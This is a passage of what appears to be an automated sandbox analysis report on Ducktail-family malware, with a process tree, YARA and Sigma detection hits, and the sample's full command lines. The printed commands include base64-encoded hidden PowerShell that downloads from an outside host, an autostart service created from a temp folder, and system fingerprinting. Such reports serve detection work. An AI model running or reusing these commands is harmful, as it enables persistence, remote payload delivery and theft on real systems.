      • conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8004 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 7920 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 8060 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 7232 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 3180 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 5496 cmdline: C:\Windows\Temp\myRdpService.exe cakoi7 MD5: 10C767E2635167724D6A03475ED8F7A9)
    • regedit.exe (PID: 1364 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)
    • powershell.exe (PID: 6636 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • systeminfo.exe (PID: 4856 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)
        • WmiPrvSE.exe (PID: 3836 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 6676 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 6220 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
  • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
  • 0x11f94:$a2: 0123456789012345678901234567890123456789
  • 0x3291c:$a3: NTPASSWORD
  • 0x2f7b4:$a4: LMPASSWORD
  • 0x5cd04:$a5: aad3b435b51404eeaad3b435b51404ee
  • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: powershell.exe PID: 3620JoeSecurity_Ducktail_12Yara detected DucktailJoe Security
    Process Memory Space: powershell.exe PID: 3620INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x2d03c6:$b1: ::WriteAllBytes(
    • 0x4bb5e5:$b1: ::WriteAllBytes(
    • 0x90c9c:$b2: ::FromBase64String(
    • 0x911f9:$b2: ::FromBase64String(
    • 0x91609:$b2: ::FromBase64String(
    • 0x9181a:$b2: ::FromBase64String(
    • 0x9192f:$b2: ::FromBase64String(
    • 0x9199a:$b2: ::FromBase64String(
    • 0x919fd:$b2: ::FromBase64String(
    • 0x91a61:$b2: ::FromBase64String(
    • 0x91abd:$b2: ::FromBase64String(
    • 0x91b5a:$b2: ::FromBase64String(
    • 0x91bc3:$b2: ::FromBase64String(
    • 0x91c2b:$b2: ::FromBase64String(
    • 0x91c91:$b2: ::FromBase64String(
    • 0x91cf5:$b2: ::FromBase64String(
    • 0x91d53:$b2: ::FromBase64String(
    • 0x91dd8:$b2: ::FromBase64String(
    • 0x91e43:$b2: ::FromBase64String(
    • 0x91ead:$b2: ::FromBase64String(
    • 0x91f0e:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 5936JoeSecurity_Ducktail_12Yara detected DucktailJoe Security
      Process Memory Space: powershell.exe PID: 5936INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc98e6:$b1: ::WriteAllBytes(
      • 0xb8a91:$b2: ::FromBase64String(
      • 0xbabbe:$b2: ::FromBase64String(
      • 0xbb972:$b2: ::FromBase64String(
      • 0xbb9e1:$b2: ::FromBase64String(
      • 0xc1578:$b2: ::FromBase64String(
      • 0x115cd8:$b3: ::UTF8.GetString(
      • 0x187a34:$s1: -join
      • 0x189975:$s1: -join
      • 0x236721:$s1: -join
      • 0x2437f6:$s1: -join
      • 0x246bc8:$s1: -join
      • 0x24727a:$s1: -join
      • 0x248d6b:$s1: -join
      • 0x24af71:$s1: -join
      • 0x24b798:$s1: -join
      • 0x24c008:$s1: -join
      • 0x24c743:$s1: -join
      • 0x24c775:$s1: -join
      • 0x24c7bd:$s1: -join
      • 0x24c7dc:$s1: -join
      Click to see the 3 entries
      SourceRuleDescriptionAuthorStrings
      41.2.myRdpService.exe.7ff63b7a0000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x511cc4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x516194:$a2: 0123456789012345678901234567890123456789
      • 0x536b1c:$a3: NTPASSWORD
      • 0x5339b4:$a4: LMPASSWORD
      • 0x560f04:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x519154:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
      SourceRuleDescriptionAuthorStrings
      amsi64_5936.amsi.csvJoeSecurity_Ducktail_12Yara detected DucktailJoe Security
        amsi64_5936.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xfd17:$b1: ::WriteAllBytes(
        • 0xc19b:$b2: ::FromBase64String(
        • 0xe2c9:$b2: ::FromBase64String(
        • 0xf07e:$b2: ::FromBase64String(
        • 0x528:$b3: ::UTF8.GetString(
        • 0xbdef:$s1: -join
        • 0x238:$s4: +=
        • 0x25b:$s4: +=
        • 0x559b:$s4: +=
        • 0x565d:$s4: +=
        • 0x9884:$s4: +=
        • 0xb9a1:$s4: +=
        • 0xbc8b:$s4: +=
        • 0xbdd1:$s4: +=
        • 0xf231:$s4: +=
        • 0xf42e:$s4: +=
        • 0x116de:$s4: +=
        • 0x69abf:$s4: +=
        • 0x69b3f:$s4: +=
        • 0x69c05:$s4: +=
        • 0x69c85:$s4: +=

        System Summary

        barindex
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 7920, ProcessName: sc.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABr